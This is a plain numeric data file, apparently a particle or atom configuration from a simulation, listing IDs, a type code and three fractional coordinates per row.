148 1 0.500077 0.0604209 0.185953
1064 1 0.125075 0.689415 0.0651019
1091 1 0.062852 0.748905 0.0671635
1096 1 0.129022 0.81093 0.069404
1186 1 0.0628945 0.691888 0.125337
1218 1 0.0683622 0.814699 0.131978
1221 1 0.132018 0.746491 0.131109
1361 1 0.50111 0.742428 0.247913
1297 1 0.489319 0.498137 0.249378
1122 1 0.0586929 0.935999 0.00582512
1068 1 0.244654 0.681695 0.0677134
1095 1 0.18813 0.744281 0.0660509
1099 1 0.309407 0.759184 0.067671
1100 1 0.241755 0.811956 0.0704696
1190 1 0.182468 0.679855 0.123067
1194 1 0.315176 0.685655 0.127667
1222 1 0.182361 0.815143 0.126975
1225 1 0.250639 0.74837 0.128419
1226 1 0.30889 0.812869 0.12753
1217 1 0.000906483 0.747758 0.130945
1570 1 0.0664239 0.685133 0.495725
1108 1 0.499365 0.815735 0.0672561
321 1 0.00362257 0.252631 0.252538
1072 1 0.370387 0.691524 0.0601836
1103 1 0.441516 0.755396 0.0667927
1104 1 0.374072 0.815658 0.0633928
1198 1 0.428047 0.690209 0.120405
1229 1 0.374592 0.753377 0.126017
1230 1 0.441998 0.815816 0.136328
1476 1 0.00163148 0.809727 0.433441
514 1 0.0578784 0.0621345 0.496763
1520 1 0.377106 0.937965 0.432814
81 1 0.499487 0.254907 0.00521653
305 1 0.49722 0.11948 0.255483
1249 1 0.000547884 0.8811 0.12106
1123 1 0.0640506 0.873165 0.0627538
1128 1 0.123176 0.940343 0.0606808
1250 1 0.0687508 0.940769 0.119142
1253 1 0.1295 0.878837 0.130497
137 1 0.248428 0.00488833 0.125315
1127 1 0.185816 0.872164 0.0687947
1131 1 0.3106 0.869434 0.0699472
1132 1 0.236828 0.940497 0.0676197
1254 1 0.184686 0.937085 0.129384
1257 1 0.25257 0.87187 0.129532
1258 1 0.311434 0.935762 0.125171
1061 1 0.124692 0.627917 0.000696627
1638 1 0.18862 0.937198 0.499721
141 1 0.368451 0.00291347 0.123479
1135 1 0.43602 0.877766 0.0638614
1136 1 0.378984 0.938132 0.0672292
1261 1 0.377402 0.869212 0.133661
1262 1 0.444203 0.940373 0.123751
1098 1 0.310403 0.810111 0.0012677
193 1 0.00985276 0.248772 0.122234
136 1 0.123987 0.0650094 0.189271
163 1 0.0609466 0.120713 0.185811
258 1 0.0616212 0.055806 0.243628
264 1 0.118879 0.0667645 0.309633
291 1 0.0577509 0.128086 0.307905
293 1 0.12091 0.126759 0.245195
131 1 0.0658527 0.00112155 0.187332
261 1 0.129675 0.0058 0.246439
1329 1 0.496981 0.624001 0.244397
9 1 0.246144 0.996994 0.0013473
140 1 0.254085 0.0642384 0.186466
167 1 0.186729 0.131153 0.188672
171 1 0.311465 0.12642 0.185214
262 1 0.189307 0.0692637 0.245001
266 1 0.309472 0.0620892 0.245564
268 1 0.242904 0.0693117 0.308758
295 1 0.180102 0.124281 0.308676
297 1 0.25563 0.127511 0.251227
299 1 0.31571 0.130019 0.311196
263 1 0.186562 0.00234539 0.313617
135 1 0.18615 0.0071088 0.187539
267 1 0.319266 0.00496826 0.312297
144 1 0.371295 0.0604511 0.185945
175 1 0.434801 0.117591 0.189761
270 1 0.445401 0.0553838 0.250253
272 1 0.37665 0.0651112 0.304923
301 1 0.377653 0.125512 0.247208
303 1 0.437144 0.115348 0.312426
271 1 0.438706 0.000201615 0.312219
397 1 0.377096 0.00292728 0.3713
6 1 0.184441 0.0657506 0.0019139
212 1 0.500406 0.313438 0.184574
1044 1 0.494863 0.551945 0.0618352
168 1 0.12234 0.192957 0.187068
195 1 0.0594346 0.251436 0.187015
200 1 0.121477 0.310043 0.182125
290 1 0.0562096 0.188119 0.246029
296 1 0.116983 0.18813 0.306482
322 1 0.0637774 0.32253 0.255528
323 1 0.0613232 0.257572 0.311369
325 1 0.1226 0.255866 0.245997
328 1 0.128551 0.307444 0.309784
172 1 0.245162 0.191663 0.193089
199 1 0.19082 0.248795 0.186776
203 1 0.308425 0.257048 0.188303
204 1 0.242225 0.316535 0.179734
294 1 0.18462 0.186519 0.2484
298 1 0.317905 0.194896 0.244338
300 1 0.249541 0.185125 0.317411
326 1 0.189674 0.310632 0.240441
327 1 0.178339 0.241297 0.315909
329 1 0.249352 0.245683 0.258235
330 1 0.313291 0.312514 0.253059
331 1 0.311074 0.245289 0.316961
332 1 0.258362 0.308838 0.313361
176 1 0.377425 0.187068 0.193835
207 1 0.443337 0.244175 0.184667
208 1 0.377584 0.30663 0.190059
302 1 0.441984 0.191504 0.250719
304 1 0.3887 0.186787 0.316106
333 1 0.378248 0.253559 0.248008
334 1 0.441101 0.317418 0.250745
335 1 0.444821 0.253209 0.314709
336 1 0.373095 0.307898 0.314281
1069 1 0.371379 0.627153 0.00377777
227 1 0.0584811 0.376194 0.185527
232 1 0.126223 0.431904 0.179881
354 1 0.0679323 0.440019 0.243481
355 1 0.0652936 0.381296 0.310579
357 1 0.123709 0.370198 0.247321
360 1 0.123861 0.439554 0.308001
1283 1 0.0570607 0.496168 0.308982
1285 1 0.122237 0.501422 0.251842
231 1 0.184319 0.374934 0.179043
235 1 0.306574 0.379635 0.190143
236 1 0.248168 0.437858 0.195515
358 1 0.183236 0.429529 0.251604
359 1 0.18612 0.367941 0.313278
361 1 0.24801 0.372312 0.247443
362 1 0.312097 0.435023 0.255183
363 1 0.314896 0.368059 0.318842
364 1 0.247957 0.429198 0.311272
1291 1 0.318397 0.496664 0.309569
1159 1 0.187938 0.488857 0.190216
239 1 0.431458 0.375198 0.190391
240 1 0.376268 0.436441 0.193677
365 1 0.378308 0.371566 0.259519
366 1 0.437117 0.432063 0.258542
367 1 0.442737 0.370473 0.319265
368 1 0.371657 0.433134 0.314859
1167 1 0.434003 0.491315 0.186216
1293 1 0.382812 0.498235 0.248692
1295 1 0.444528 0.503469 0.318568
1515 1 0.31731 0.87668 0.432193
1155 1 0.0581565 0.499508 0.191349
1160 1 0.122699 0.560468 0.191347
1187 1 0.0613002 0.625322 0.190782
1282 1 0.0645446 0.564985 0.246204
1288 1 0.125114 0.562941 0.315179
1315 1 0.0723561 0.624112 0.302033
1317 1 0.135365 0.625226 0.252953
1163 1 0.307918 0.500259 0.190197
1289 1 0.250447 0.501533 0.251385
1287 1 0.188406 0.495475 0.315679
1164 1 0.245505 0.562589 0.184702
1191 1 0.181895 0.619937 0.188987
1195 1 0.310631 0.616348 0.181685
1286 1 0.187936 0.56045 0.250258
1290 1 0.315099 0.564982 0.255034
1292 1 0.251809 0.558748 0.31297
1319 1 0.182947 0.624692 0.321314
1321 1 0.246222 0.625442 0.254702
1323 1 0.311919 0.622046 0.320433
1511 1 0.185732 0.875869 0.444462
1516 1 0.251629 0.948997 0.437168
1168 1 0.37109 0.560881 0.188393
1199 1 0.435869 0.619282 0.177456
1294 1 0.438447 0.561858 0.247485
1296 1 0.379597 0.565741 0.316607
1325 1 0.381041 0.625463 0.249178
1327 1 0.445488 0.628156 0.31602
1514 1 0.316729 0.940896 0.375567
1513 1 0.253676 0.88661 0.375539
1192 1 0.12002 0.68435 0.187276
1219 1 0.063317 0.75069 0.183652
1224 1 0.122879 0.82223 0.196096
1314 1 0.0636973 0.682965 0.249217
1320 1 0.129603 0.688176 0.313815
1346 1 0.0669546 0.815863 0.255792
1347 1 0.0615069 0.751418 0.31875
1349 1 0.124737 0.743975 0.245825
1352 1 0.130553 0.810489 0.315963
1185 1 0.00111593 0.624261 0.124467
1196 1 0.248256 0.686206 0.188205
1223 1 0.18561 0.754297 0.189742
1227 1 0.310855 0.754423 0.191879
1228 1 0.248007 0.81571 0.191192
1318 1 0.188002 0.684677 0.253328
1322 1 0.313007 0.68669 0.256427
1324 1 0.249513 0.684527 0.314034
1350 1 0.187634 0.818935 0.256271
1351 1 0.188083 0.750244 0.312902
1353 1 0.250234 0.747796 0.249577
1354 1 0.305969 0.816266 0.250119
1355 1 0.314881 0.749182 0.319014
1356 1 0.256117 0.81309 0.316444
196 1 0.00133587 0.314031 0.188279
1200 1 0.376885 0.687843 0.183465
1231 1 0.434996 0.749544 0.184511
1232 1 0.37431 0.81492 0.193954
1326 1 0.437296 0.68043 0.251144
1328 1 0.374986 0.680878 0.313177
1357 1 0.369748 0.746614 0.251181
1358 1 0.430186 0.80511 0.251429
1359 1 0.436595 0.743978 0.306202
1360 1 0.377354 0.813399 0.313582
1169 1 0.496795 0.496026 0.122202
1492 1 0.495264 0.808335 0.439008
1510 1 0.189285 0.937625 0.379654
259 1 0.0616108 0.00609116 0.313343
1251 1 0.0604663 0.881148 0.185017
1256 1 0.123205 0.939153 0.188512
1378 1 0.0671411 0.944578 0.252328
1379 1 0.0621708 0.877223 0.311291
1381 1 0.130095 0.885386 0.248424
1384 1 0.129372 0.946987 0.308022
139 1 0.310667 -0.000586023 0.188049
265 1 0.243492 0.00586126 0.250032
1255 1 0.192098 0.881365 0.189305
1259 1 0.310993 0.877608 0.184341
1260 1 0.250688 0.941238 0.183361
1382 1 0.193861 0.94295 0.244052
1383 1 0.190004 0.883012 0.310358
1385 1 0.252414 0.87783 0.245933
1386 1 0.312433 0.947776 0.25524
1387 1 0.315165 0.878357 0.311876
1388 1 0.252746 0.942551 0.313543
269 1 0.378639 0.0063057 0.248939
497 1 0.49931 0.379061 0.381495
143 1 0.435347 0.00163969 0.186248
1263 1 0.439435 0.875724 0.195555
1264 1 0.379239 0.940204 0.187056
1389 1 0.375194 0.87784 0.253987
1390 1 0.440428 0.939508 0.254421
1391 1 0.439072 0.873062 0.309766
1392 1 0.375403 0.9424 0.313644
1602 1 0.0616352 0.814 0.498601
549 1 0.128528 0.132308 0.497121
386 1 0.0569733 0.0629739 0.370106
392 1 0.12257 0.0654176 0.43596
419 1 0.0628187 0.124849 0.444248
421 1 0.121267 0.131433 0.382392
387 1 0.06656 0.00118361 0.440437
1076 1 0.494326 0.692112 0.061884
110 1 0.437572 0.436369 0.00138385
395 1 0.313731 0.995197 0.439467
391 1 0.180295 0.00335171 0.439254
393 1 0.252264 0.00485426 0.372846
390 1 0.181514 0.0691291 0.374041
394 1 0.316758 0.0636891 0.370396
396 1 0.247806 0.0592955 0.437547
423 1 0.189395 0.119644 0.434453
425 1 0.25293 0.125275 0.375101
427 1 0.309782 0.127389 0.432472
164 1 0.00204353 0.197459 0.185363
526 1 0.437304 0.060097 0.497528
399 1 0.441303 0.995603 0.430014
129 1 0.00162282 0.00485417 0.123441
398 1 0.444214 0.062927 0.378378
400 1 0.37495 0.055126 0.433773
429 1 0.368466 0.126177 0.374709
431 1 0.426671 0.124337 0.437632
1649 1 0.497927 0.87405 0.496675
1252 1 0.00656793 0.944213 0.182436
389 1 0.119657 0.000738156 0.374961
1070 1 0.435531 0.694115 0.000838219
418 1 0.065212 0.194248 0.371281
424 1 0.119539 0.192901 0.439251
450 1 0.0594098 0.313288 0.374641
451 1 0.0574077 0.252246 0.443657
453 1 0.120646 0.256322 0.369478
456 1 0.122796 0.31363 0.436414
522 1 0.312083 0.0618429 0.498301
1456 1 0.373953 0.687342 0.433841
1450 1 0.301254 0.683802 0.378045
422 1 0.185853 0.179756 0.380374
426 1 0.31344 0.189863 0.37896
428 1 0.250628 0.192116 0.439584
454 1 0.188528 0.312496 0.374727
455 1 0.181208 0.256562 0.430847
457 1 0.245626 0.246432 0.373248
458 1 0.306007 0.306806 0.38702
459 1 0.30865 0.251428 0.447595
460 1 0.244771 0.310343 0.44141
1125 1 0.124441 0.868058 0.00826625
1507 1 0.063721 0.877165 0.437489
1610 1 0.316899 0.819566 0.492519
430 1 0.44137 0.189169 0.379203
432 1 0.373069 0.188309 0.433828
461 1 0.373603 0.251829 0.379882
462 1 0.442832 0.309786 0.375519
463 1 0.436189 0.250954 0.434363
464 1 0.373468 0.316529 0.437557
1126 1 0.183194 0.932808 0.00135053
485 1 0.126966 0.369934 0.371827
488 1 0.127668 0.441392 0.437181
483 1 0.0616457 0.372156 0.432483
482 1 0.0596638 0.431875 0.373015
1413 1 0.124404 0.501945 0.377146
1506 1 0.063731 0.941698 0.372346
1484 1 0.251597 0.816295 0.433975
1487 1 0.435496 0.751892 0.442632
492 1 0.251616 0.439107 0.439855
489 1 0.252561 0.371527 0.373648
486 1 0.183323 0.433009 0.375975
487 1 0.183264 0.36999 0.443215
491 1 0.315599 0.376345 0.44278
490 1 0.31018 0.436097 0.375515
1419 1 0.307041 0.497635 0.438737
1415 1 0.190742 0.497207 0.43716
1417 1 0.251529 0.491793 0.373438
1485 1 0.386539 0.745974 0.369904
1573 1 0.129532 0.619466 0.499045
1488 1 0.374448 0.8123 0.4301
1454 1 0.443213 0.681218 0.380486
494 1 0.439604 0.433858 0.369225
495 1 0.436621 0.373104 0.439822
496 1 0.373932 0.440714 0.436066
493 1 0.378481 0.377805 0.381454
622 1 0.436843 0.440384 0.499497
1421 1 0.379043 0.496952 0.374429
1423 1 0.433981 0.499768 0.441967
1509 1 0.121164 0.879743 0.371557
1188 1 0.00279276 0.693344 0.191499
1411 1 0.0595898 0.498299 0.440554
1410 1 0.0615706 0.554786 0.370013
1416 1 0.125117 0.558166 0.434881
1443 1 0.0590573 0.625885 0.435621
1445 1 0.124313 0.617048 0.375446
337 1 0.497296 0.250873 0.251919
1449 1 0.244047 0.625053 0.376423
1451 1 0.307609 0.620311 0.434374
1420 1 0.24799 0.556653 0.437374
1447 1 0.185528 0.628562 0.435557
1414 1 0.188399 0.557931 0.376845
1418 1 0.314542 0.556516 0.375672
1486 1 0.438282 0.818741 0.373548
241 1 0.501133 0.376661 0.121845
1605 1 0.120254 0.748418 0.50211
4 1 0.00638131 0.0682505 0.0639101
1422 1 0.433502 0.561262 0.382869
1455 1 0.437154 0.626248 0.437778
1424 1 0.370078 0.557397 0.439843
1453 1 0.37119 0.627525 0.382438
1512 1 0.128865 0.939673 0.434288
1474 1 0.0600866 0.818683 0.363121
1480 1 0.125936 0.816587 0.439082
1475 1 0.0673812 0.754322 0.43341
1442 1 0.0623344 0.688443 0.371449
1477 1 0.127569 0.748902 0.375008
1448 1 0.120712 0.68127 0.429473
1060 1 -0.000875945 0.689024 0.067351
1483 1 0.307785 0.749735 0.434794
1479 1 0.185944 0.74914 0.436479
1482 1 0.311365 0.814324 0.374145
1446 1 0.187843 0.685927 0.375991
1452 1 0.247078 0.689672 0.437787
1481 1 0.250239 0.753047 0.371383
1478 1 0.188043 0.822309 0.371119
500 1 0.498834 0.439723 0.443634
1220 1 0.00683256 0.816598 0.192867
1412 1 0.00173819 0.561304 0.443987
401 1 0.50122 0.000519874 0.373717
369 1 0.499991 0.375315 0.24427
289 1 0.00260733 0.12673 0.249401
417 1 0.00406402 0.130338 0.378279
1124 1 0.000437057 0.943592 0.0638882
433 1 0.500489 0.127664 0.376013
1201 1 0.498046 0.630237 0.125363
1489 1 0.493322 0.751008 0.377614
525 1 0.380361 0.99466 0.494533
1062 1 0.191046 0.6891 0.00493153
1204 1 0.492101 0.691546 0.184467
1105 1 0.497644 0.746893 0.00396259
518 1 0.190327 0.0667529 0.498173
554 1 0.312852 0.188808 0.497126
33 1 0.00268749 0.127788 0.00173414
581 1 0.13337 0.247866 0.500551
617 1 0.248391 0.378579 0.499618
1581 1 0.372222 0.627381 0.491403
1546 1 0.313301 0.561468 0.500429
1097 1 0.246554 0.75732 0.00766128
1582 1 0.434017 0.688954 0.494486
1089 1 0.00123369 0.748198 0.000774587
613 1 0.118774 0.369442 0.498904
558 1 0.436757 0.187235 0.491404
1549 1 0.37733 0.500243 0.499677
625 1 0.498171 0.377741 0.499274
106 1 0.309753 0.433479 0.00664018
553 1 0.253945 0.12693 0.494205
1574 1 0.185185 0.687926 0.497632
10 1 0.304263 0.0653689 0.000684848
78 1 0.436952 0.311512 0.00407307
1073 1 0.497823 0.630508 0.00787249
1101 1 0.371692 0.754779 0.00381889
1033 1 0.25667 0.501087 0.00483557
1129 1 0.243436 0.870458 0.00983062
73 1 0.246269 0.248767 0.00376876
1538 1 0.0638315 0.565363 0.497159
74 1 0.306516 0.307036 0.000685393
1578 1 0.31392 0.686934 0.494658
1634 1 0.0644011 0.935675 0.494333
1633 1 0.00189301 0.869404 0.498968
1102 1 0.440004 0.807531 0.00589282
1090 1 0.0587013 0.807969 0.0046384
1550 1 0.438842 0.566069 0.492627
1569 1 0.00053881 0.623086 0.495578
1066 1 0.30522 0.688183 0.00377618
520 1 0.123977 0.0604492 0.555822
547 1 0.0633349 0.125608 0.557356
642 1 0.0732341 0.0513143 0.619561
677 1 0.123168 0.117595 0.614814
515 1 0.0634356 0.993431 0.558103
868 1 0.00222562 0.441263 0.808863
911 1 0.440651 0.00380783 0.941474
524 1 0.245338 0.0627485 0.559035
551 1 0.181864 0.126405 0.562998
555 1 0.308892 0.127715 0.560079
646 1 0.190035 0.0601268 0.626499
650 1 0.310283 0.0687987 0.624631
681 1 0.24888 0.132101 0.619316
1729 1 0.00724713 0.742191 0.625533
519 1 0.18265 0.00428977 0.562938
649 1 0.25195 0.998338 0.626277
1009 1 0.498802 0.369669 0.879478
528 1 0.370419 0.0618058 0.560166
559 1 0.434484 0.124101 0.562411
654 1 0.441442 0.0663305 0.622524
685 1 0.369453 0.12873 0.621473
653 1 0.376299 0.00649826 0.629925
1540 1 0.000499783 0.561419 0.560258
1545 1 0.249988 0.494315 0.501272
705 1 0.000164435 0.247845 0.624995
552 1 0.119381 0.185298 0.564534
579 1 0.0614591 0.243452 0.566189
584 1 0.125013 0.309455 0.572241
674 1 0.0624132 0.181109 0.625639
706 1 0.0689301 0.311448 0.635596
709 1 0.129435 0.244942 0.630085
1588 1 0.498016 0.684315 0.562069
909 1 0.36896 0.996079 0.882385
1041 1 0.499762 0.492785 0.997675
1572 1 0.00723593 0.683427 0.563257
556 1 0.25256 0.190227 0.564215
583 1 0.187717 0.247759 0.561479
587 1 0.312924 0.252269 0.563568
588 1 0.248308 0.316815 0.567058
678 1 0.181809 0.182664 0.626876
682 1 0.313547 0.187792 0.630659
710 1 0.188993 0.311699 0.631321
713 1 0.249259 0.248523 0.629578
714 1 0.313856 0.317914 0.623597
1873 1 0.498633 0.749157 0.750755
548 1 0.00259737 0.186722 0.564518
560 1 0.374862 0.184811 0.563004
591 1 0.436044 0.256205 0.560094
592 1 0.373457 0.309964 0.560982
686 1 0.436974 0.195353 0.624162
717 1 0.371102 0.251345 0.620679
718 1 0.439043 0.320765 0.629724
2031 1 0.43067 0.8723 0.948336
2032 1 0.373438 0.93251 0.939554
804 1 0.00304562 0.175065 0.805767
1940 1 0.49874 0.564462 0.94466
1953 1 0.0016858 0.624099 0.877641
611 1 0.0611975 0.370101 0.566867
616 1 0.123846 0.435416 0.562907
738 1 0.0627463 0.433134 0.626233
741 1 0.129362 0.373022 0.630593
621 1 0.372616 0.378044 0.503582
582 1 0.190748 0.316598 0.507571
609 1 0.00290878 0.369882 0.501942
615 1 0.181967 0.376729 0.567518
619 1 0.308414 0.37681 0.565389
620 1 0.252047 0.437376 0.562938
742 1 0.187978 0.437311 0.628779
745 1 0.248274 0.379597 0.632983
746 1 0.312628 0.435548 0.62615
1673 1 0.246357 0.494375 0.626817
577 1 0.00510221 0.249412 0.511243
1543 1 0.184057 0.494584 0.562051
1809 1 0.499947 0.511026 0.747181
623 1 0.437988 0.37318 0.559925
624 1 0.380773 0.442824 0.558946
749 1 0.375961 0.379343 0.618894
750 1 0.435258 0.438368 0.624516
1551 1 0.43625 0.498358 0.567557
564 1 0.499999 0.187911 0.556066
1669 1 0.124031 0.498725 0.622833
1539 1 0.0594654 0.497474 0.566614
1544 1 0.128719 0.561425 0.565063
1571 1 0.0640524 0.622686 0.558382
1666 1 0.0639982 0.560438 0.624508
1701 1 0.120652 0.628086 0.622104
929 1 0.00226069 0.122809 0.873626
1844 1 0.493543 0.693818 0.810513
1547 1 0.317785 0.504211 0.558164
1548 1 0.249424 0.570303 0.565527
1575 1 0.191342 0.632646 0.566871
1579 1 0.31094 0.632143 0.562372
1670 1 0.191556 0.558747 0.61749
1674 1 0.310405 0.56004 0.622469
1705 1 0.250536 0.630154 0.631864
772 1 0.00596692 0.0648479 0.813157
1677 1 0.372748 0.502794 0.624932
1552 1 0.37913 0.563219 0.561024
1583 1 0.433431 0.622802 0.551848
1678 1 0.436728 0.56185 0.626325
1709 1 0.373827 0.625168 0.628242
1541 1 0.120137 0.498803 0.50647
1637 1 0.126416 0.870481 0.504586
42 1 0.311749 0.190849 0.997145
660 1 0.499151 0.0665702 0.685409
1576 1 0.127184 0.692389 0.556141
1603 1 0.0609497 0.752045 0.55972
1608 1 0.126943 0.808558 0.566963
1698 1 0.0731661 0.692795 0.617478
1730 1 0.0630094 0.807714 0.627986
1733 1 0.129087 0.753793 0.63073
2017 1 0.00207008 0.872073 0.879974
932 1 0.000925772 0.193611 0.93787
1777 1 0.498623 0.872124 0.618788
641 1 0.0018219 0.00123508 0.621598
1652 1 0.495877 0.937758 0.560031
1580 1 0.254863 0.695905 0.560081
1607 1 0.192666 0.752406 0.56493
1611 1 0.315587 0.751245 0.565094
1612 1 0.258638 0.813304 0.559565
1702 1 0.179764 0.69447 0.623199
1706 1 0.311512 0.692664 0.624902
1734 1 0.187401 0.810243 0.628095
1737 1 0.256239 0.758833 0.627738
1738 1 0.312228 0.815258 0.632999
1732 1 0.00290338 0.80465 0.692125
1905 1 0.497669 0.880389 0.745059
644 1 0.0104822 0.0554352 0.683426
692 1 0.497763 0.190401 0.684087
1584 1 0.369939 0.684252 0.563217
1615 1 0.436198 0.743448 0.558506
1616 1 0.369992 0.814646 0.556615
1710 1 0.43807 0.68291 0.620401
1741 1 0.373877 0.758863 0.629287
1742 1 0.44663 0.800666 0.626498
2030 1 0.440905 0.937626 0.877273
1716 1 0.500194 0.681278 0.68404
1636 1 0.0028323 0.933822 0.558646
1620 1 0.498145 0.809947 0.561538
645 1 0.133889 0.000149379 0.635852
1635 1 0.0626861 0.875047 0.564362
1640 1 0.127575 0.934673 0.562079
1762 1 0.0620404 0.937878 0.622764
1765 1 0.128437 0.870645 0.623234
801 1 0.000599021 0.111601 0.742532
523 1 0.310404 1.00002 0.555652
1639 1 0.19179 0.874757 0.564431
1643 1 0.314204 0.876968 0.563432
1644 1 0.249546 0.937018 0.560024
1766 1 0.192319 0.939018 0.632605
1769 1 0.248856 0.870633 0.627293
1770 1 0.323135 0.936901 0.627933
852 1 0.50055 0.315839 0.807726
1029 1 0.124377 0.496603 0.999773
527 1 0.43927 0.00661804 0.56012
1134 1 0.43566 0.93428 0.999685
1647 1 0.440849 0.872877 0.562715
1648 1 0.373073 0.945329 0.560451
1773 1 0.370939 0.873374 0.620064
1774 1 0.431633 0.939083 0.614704
817 1 0.497508 0.128986 0.745576
881 1 0.497731 0.382507 0.751532
1748 1 0.499718 0.810558 0.69346
648 1 0.123815 0.0632718 0.683326
675 1 0.0715135 0.123845 0.685478
770 1 0.0687247 0.0565199 0.746072
776 1 0.129586 0.0584929 0.808641
803 1 0.0687401 0.12048 0.800832
805 1 0.131141 0.120364 0.750219
771 1 0.0627579 0.993385 0.811755
652 1 0.250173 0.0683582 0.687448
679 1 0.184601 0.122671 0.682323
683 1 0.310397 0.125931 0.688356
774 1 0.197369 0.0629343 0.751987
778 1 0.308361 0.057419 0.748606
780 1 0.245996 0.061019 0.816401
807 1 0.185206 0.127926 0.807097
809 1 0.253992 0.128457 0.757682
811 1 0.312179 0.128322 0.816247
779 1 0.314683 0.997784 0.812568
777 1 0.255839 0.997411 0.756402
647 1 0.19755 0.0010089 0.692744
656 1 0.373973 0.0665076 0.691536
687 1 0.434426 0.130512 0.680279
782 1 0.436592 0.0643337 0.749592
784 1 0.371447 0.0623557 0.815114
813 1 0.372729 0.119929 0.755551
815 1 0.435726 0.13079 0.810348
1553 1 0.495393 0.504469 0.500139
781 1 0.376696 0.00341384 0.748142
1577 1 0.252494 0.631107 0.499644
34 1 0.0694382 0.185689 0.991605
2029 1 0.373328 0.877084 0.878533
680 1 0.125488 0.186089 0.691858
707 1 0.0658074 0.244405 0.688538
712 1 0.132364 0.310387 0.694014
802 1 0.0654326 0.185724 0.752646
808 1 0.125843 0.18896 0.810925
834 1 0.053685 0.31197 0.743513
835 1 0.0569544 0.247396 0.801844
837 1 0.125965 0.251893 0.752879
840 1 0.12323 0.309991 0.80745
684 1 0.251107 0.18462 0.685942
711 1 0.191803 0.247374 0.690896
715 1 0.316155 0.247981 0.684815
716 1 0.252695 0.316036 0.693052
806 1 0.191799 0.18711 0.749204
810 1 0.314708 0.189438 0.758202
812 1 0.249503 0.189182 0.807916
838 1 0.193076 0.316675 0.756947
839 1 0.189268 0.245292 0.8046
841 1 0.252854 0.249146 0.745329
842 1 0.313696 0.316137 0.751426
843 1 0.308969 0.249746 0.815769
844 1 0.253045 0.318785 0.817244
1542 1 0.197189 0.556668 0.50006
2023 1 0.182362 0.871259 0.935012
1985 1 0.00186657 0.73647 0.881461
688 1 0.380412 0.190831 0.69752
719 1 0.436883 0.253463 0.68364
720 1 0.372423 0.311439 0.69095
814 1 0.441154 0.19109 0.75434
816 1 0.376937 0.18973 0.815109
845 1 0.3795 0.251198 0.757732
846 1 0.437365 0.308622 0.750603
847 1 0.438731 0.255374 0.817785
848 1 0.379257 0.317151 0.815725
739 1 0.0656507 0.378647 0.692795
744 1 0.12614 0.436811 0.685333
866 1 0.0659782 0.439863 0.750137
867 1 0.0595369 0.381182 0.800884
869 1 0.128723 0.378427 0.755201
872 1 0.12509 0.446814 0.811066
1667 1 0.054623 0.505987 0.682508
1797 1 0.119083 0.507435 0.74701
743 1 0.191109 0.373755 0.69124
747 1 0.315918 0.380824 0.692103
748 1 0.257061 0.441634 0.694028
870 1 0.188835 0.444111 0.751979
871 1 0.190065 0.379878 0.814376
873 1 0.252347 0.376402 0.750349
874 1 0.321812 0.434121 0.756598
875 1 0.321634 0.376475 0.816011
876 1 0.261064 0.43893 0.819421
1801 1 0.258023 0.496367 0.757682
1799 1 0.19051 0.499942 0.824224
1671 1 0.187656 0.501104 0.685645
1803 1 0.319533 0.496086 0.821888
1780 1 0.498347 0.943529 0.68943
751 1 0.437003 0.379465 0.688761
752 1 0.376361 0.440606 0.687569
877 1 0.385343 0.375799 0.750577
878 1 0.441018 0.444079 0.755637
879 1 0.439045 0.37937 0.816083
880 1 0.383493 0.43463 0.817308
1805 1 0.3687 0.501229 0.747892
1795 1 0.0532087 0.502562 0.812529
1672 1 0.127128 0.559035 0.686252
1699 1 0.0559738 0.625877 0.682655
1794 1 0.0584834 0.562659 0.749548
1800 1 0.121177 0.562349 0.811061
1827 1 0.0621523 0.621556 0.809491
1829 1 0.125736 0.621646 0.744713
1604 1 0.00676994 0.813406 0.562854
905 1 0.24437 0.999662 0.866237
907 1 0.313874 0.998424 0.946296
1675 1 0.313025 0.497162 0.684547
1676 1 0.251444 0.558454 0.68083
1703 1 0.185988 0.626122 0.683866
1707 1 0.309941 0.625679 0.688715
1798 1 0.188503 0.555807 0.754764
1802 1 0.314149 0.569936 0.75013
1804 1 0.255297 0.559308 0.813965
1831 1 0.182666 0.628203 0.812472
1833 1 0.242815 0.628459 0.754278
1835 1 0.317255 0.618289 0.814762
1807 1 0.447268 0.499616 0.811895
1679 1 0.440159 0.500782 0.684586
1680 1 0.37584 0.55824 0.690291
1711 1 0.444996 0.622643 0.686201
1806 1 0.43994 0.561332 0.748923
1808 1 0.374894 0.560008 0.811172
1837 1 0.377152 0.626612 0.738795
1839 1 0.435209 0.625749 0.814335
1704 1 0.123966 0.686449 0.687476
1731 1 0.0625033 0.748587 0.689493
1736 1 0.125491 0.811235 0.687396
1826 1 0.0641936 0.688955 0.744493
1832 1 0.113112 0.688254 0.806938
1858 1 0.062125 0.805698 0.754552
1859 1 0.0533376 0.746908 0.810155
1861 1 0.124668 0.746271 0.746006
1864 1 0.123438 0.808154 0.809238
516 1 0.000360991 0.0689656 0.560788
1708 1 0.247743 0.693864 0.683967
1735 1 0.19331 0.758808 0.685433
1739 1 0.316756 0.753162 0.690397
1740 1 0.24732 0.817392 0.690751
1830 1 0.186333 0.686621 0.750196
1834 1 0.315378 0.688775 0.747726
1836 1 0.24195 0.688054 0.812689
1862 1 0.184997 0.809827 0.754687
1863 1 0.183641 0.749134 0.814251
1865 1 0.25818 0.7459 0.751672
1866 1 0.316232 0.812202 0.756334
1867 1 0.311436 0.751806 0.81506
1868 1 0.246382 0.811001 0.810099
769 1 0.00197362 0.00244668 0.75356
721 1 0.501656 0.256104 0.618178
1712 1 0.381423 0.690545 0.67862
1743 1 0.437913 0.750569 0.696013
1744 1 0.376776 0.822359 0.688562
1838 1 0.432112 0.686844 0.744947
1840 1 0.375544 0.688817 0.815388
1869 1 0.374799 0.760121 0.751598
1870 1 0.441091 0.817424 0.751925
1871 1 0.432293 0.758456 0.813486
1872 1 0.374006 0.819757 0.81459
673 1 0.000732646 0.122567 0.628393
657 1 0.499146 0.993016 0.624781
45 1 0.369021 0.118512 0.996571
1921 1 0.00182092 0.496117 0.876532
643 1 0.0641258 0.991119 0.689014
773 1 0.121038 0.993394 0.749768
1763 1 0.0547143 0.87423 0.681498
1768 1 0.127646 0.93463 0.688429
1890 1 0.0558112 0.932969 0.756925
1891 1 0.0556957 0.873249 0.815589
1893 1 0.121015 0.878208 0.753493
1896 1 0.123327 0.931308 0.818116
2 1 0.0658173 0.0607994 0.998931
901 1 0.124172 0.995588 0.882624
775 1 0.174214 0.993844 0.815135
651 1 0.31404 0.994271 0.690079
1767 1 0.181605 0.874756 0.688202
1771 1 0.317602 0.874031 0.692539
1772 1 0.256974 0.936133 0.689416
1894 1 0.191925 0.936504 0.754893
1895 1 0.185231 0.876332 0.811822
1897 1 0.253519 0.875997 0.75135
1898 1 0.320201 0.935488 0.749792
1899 1 0.316043 0.878903 0.818012
